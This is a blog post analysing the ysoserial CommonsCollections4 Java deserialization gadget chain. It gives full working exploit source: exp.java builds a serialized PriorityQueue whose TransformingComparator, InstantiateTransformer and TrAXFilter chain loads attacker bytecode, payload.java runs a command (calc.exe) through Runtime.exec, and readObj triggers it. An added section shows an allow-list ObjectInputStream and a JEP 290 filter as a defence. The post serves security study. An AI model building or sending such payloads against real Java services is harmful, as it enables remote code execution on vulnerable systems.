Java deserialization: ysoserial debugging and analysis, summary part (4)

1. Preface

This article continues with the CommonsCollections4 gadget chain. CC4 is a reworking of CC2 in the same way that CC3 is a reworking of CC1: the InvokerTransformer inside the ChainedTransformer is replaced by an InstantiateTransformer, so no method is invoked through reflection; the chain instantiates TrAXFilter instead. Because the first element of the chain is a ConstantTransformer, which ignores its input, the objects placed in the outer PriorityQueue no longer matter (in CC2 the queue had to hold the TemplatesImpl itself, because the InvokerTransformer called newTransformer on the queue element). Note that ysoserial's CC4 targets commons-collections4 4.0: from 4.1 onward InstantiateTransformer and InvokerTransformer refuse to deserialize unless the system property org.apache.commons.collections.enableUnsafeSerialization is set to true.

The abbreviated call stack is shown in the figure below:

2. Gadget chain analysis:

The call still starts from PriorityQueue.readObject.

readObject calls heapify(), which calls siftDown() and then siftDownUsingComparator(), and that invokes comparator.compare(). The compare method of org/apache/commons/collections4/comparators/TransformingComparator.class then calls the ChainedTransformer's transform method on each element.

The first transformer to be used is again a ConstantTransformer, which returns TrAXFilter.class regardless of the input.

In the second round the InstantiateTransformer looks up the TrAXFilter constructor whose parameter type is Templates and invokes it, passing the TemplatesImpl instance as the argument.

Inside the TrAXFilter constructor, templates.newTransformer() is called, which defines and instantiates the class stored in _bytecodes, giving RCE.

ysoserial construction analysis:

First a Templates instance is built, then the pieces the ChainedTransformer needs: the first one is a ConstantTransformer.

The second element of the chain is what distinguishes this chain from CC2: an InstantiateTransformer.

The two transformers are put into the ChainedTransformer, the outer PriorityQueue is built, and the ChainedTransformer is wrapped in a TransformingComparator. ysoserial initially fills the ConstantTransformer and the InstantiateTransformer with harmless placeholders so that the two add() calls on the queue do not fire the chain locally; only afterwards does it write TrAXFilter.class into the ConstantTransformer and the Templates object into the InstantiateTransformer's argument and parameter-type arrays. That completes the construction.

Manual exp construction:

 exp.java

package CommonsCollections4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.File;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class exp {
    public static void main(String[] args) throws Exception {
        // 1. TemplatesImpl carrying the translet bytecode. _name must be non-null, otherwise
        //    getTransletInstance() returns null without ever defining the class.
        //    (_tfactory is transient and is recreated by TemplatesImpl.readObject on the target side.)
        TemplatesImpl tmp = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(payload.class));
        CtClass pay_class = pool.get(payload.class.getName());
        byte[] payCode = pay_class.toBytecode();

        Field byteCode = TemplatesImpl.class.getDeclaredField("_bytecodes");
        byteCode.setAccessible(true);
        byteCode.set(tmp, new byte[][]{payCode});
        Field name = TemplatesImpl.class.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(tmp, "tr1ple");

        // 2. ConstantTransformer -> TrAXFilter.class; InstantiateTransformer -> new TrAXFilter(tmp)
        Transformer[] trans = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{tmp})
        };
        ChainedTransformer chian = new ChainedTransformer(trans);
        TransformingComparator transCom = new TransformingComparator(chian);

        // 3. Build the queue WITHOUT the comparator first: constructing it with transCom
        //    (the commented-out line) would run the chain locally when the second add() compares.
        //PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian));
        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);   // contents are irrelevant: ConstantTransformer ignores its input
        queue.add(1);   // size must be >= 2, otherwise heapify() in readObject never calls compare()

        // 4. Inject the comparator by reflection after the elements are in place
        Field com = PriorityQueue.class.getDeclaredField("comparator");
        com.setAccessible(true);
        com.set(queue, transCom);

        // 5. Serialize; close() flushes the ObjectOutputStream buffer to disk
        File file = new File(System.getProperty("user.dir") + "/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        try (ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file))) {
            obj_out.writeObject(queue);
        }
    }
}

readobj.java

package CommonsCollections4;

import java.io.*;

public class readObj {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        File file = new File(System.getProperty("user.dir") + "/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        // Plain ObjectInputStream, no filter: PriorityQueue.readObject -> heapify() -> compare() fires the chain.
        // A ClassCastException from ComparableComparator follows, but only after the translet has run.
        try (ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file))) {
            obj.readObject();
        }
    }
}
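The reader above accepts any class the stream names, which is exactly what the chain relies on. As an added example that is not part of the original post, the following class shows the check a practitioner would put in front of readObject(): an ObjectInputStream subclass whose resolveClass() consults an allow-list. resolveClass() runs when a class descriptor is read, before that object's readObject(), so the TransformingComparator is refused before PriorityQueue.readObject ever reaches heapify(). The class names SafeReadObj and AllowListObjectInputStream are assumptions; the two inputs are constructed inline (a legitimate queue, and a queue with the same comparator-injection shape as the CC4 payload but a harmless ConstantTransformer), and the page's commonscollections4.ser is read as a third input only if exp.java has produced it.

```java
package CommonsCollections4;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.util.Arrays;
import java.util.List;
import java.util.PriorityQueue;

public class SafeReadObj {

    /** Look-ahead stream: every class descriptor passes through resolveClass(), which runs before
     *  the corresponding object's readObject(), so a gadget class is refused before it can execute. */
    static class AllowListObjectInputStream extends ObjectInputStream {
        private final List<String> allowed;

        AllowListObjectInputStream(InputStream in, List<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!allowed.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "not on the deserialization allow-list");
            }
            return super.resolveClass(desc);
        }
    }

    // Only what a legitimate PriorityQueue<Integer> stream contains; superclass descriptors are resolved too.
    static final List<String> ALLOWED = Arrays.asList(
            "java.util.PriorityQueue", "java.lang.Integer", "java.lang.Number");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Returns a verdict string instead of throwing, so both outcomes can be printed side by side. */
    static String tryRead(byte[] data) {
        try (ObjectInputStream in = new AllowListObjectInputStream(new ByteArrayInputStream(data), ALLOWED)) {
            return "accepted: " + in.readObject();
        } catch (InvalidClassException e) {
            return "rejected: " + e.getMessage();
        } catch (Exception e) {
            return "failed: " + e;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed input 1: a plain queue, the kind of object the application expects.
        PriorityQueue<Integer> benign = new PriorityQueue<>(Arrays.asList(3, 1, 2));

        // Constructed input 2: same shape as the CC4 payload (comparator injected after add()),
        // but with a harmless ConstantTransformer instead of the TrAXFilter chain.
        PriorityQueue<Object> gadgetShaped = new PriorityQueue<>(2);
        gadgetShaped.add(1);
        gadgetShaped.add(1);
        Field com = PriorityQueue.class.getDeclaredField("comparator");
        com.setAccessible(true);
        com.set(gadgetShaped, new TransformingComparator(new ConstantTransformer("x")));

        System.out.println(tryRead(serialize(benign)));        // accepted
        System.out.println(tryRead(serialize(gadgetShaped)));  // rejected at the TransformingComparator descriptor

        // Input 3: the page's real payload file, if exp.java has generated it
        File ser = new File(System.getProperty("user.dir") + "/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        if (ser.exists()) {
            System.out.println(tryRead(Files.readAllBytes(ser.toPath())));
        }
    }
}
```

On JDK 8u121 and later (JEP 290) the same policy can be applied process-wide without subclassing the stream, for example with -Djdk.serialFilter='java.util.PriorityQueue;java.lang.Integer;java.lang.Number;!*', where the trailing !* rejects every class not listed before it.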

payload.java

package CommonsCollections4;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

// Must extend AbstractTranslet: defineTransletClasses() only records a class as the translet
// if its superclass is AbstractTranslet, and getTransletInstance() then calls newInstance() on it.
public class payload extends AbstractTranslet {
    // Instance initializer: runs on newInstance(), i.e. when TrAXFilter calls templates.newTransformer()
    {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public payload() {
        System.out.println("tr1ple 2333");
    }

    // The two abstract methods of AbstractTranslet; they are never called by the chain
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

posted @ 2020-03-03 22:29  tr1ple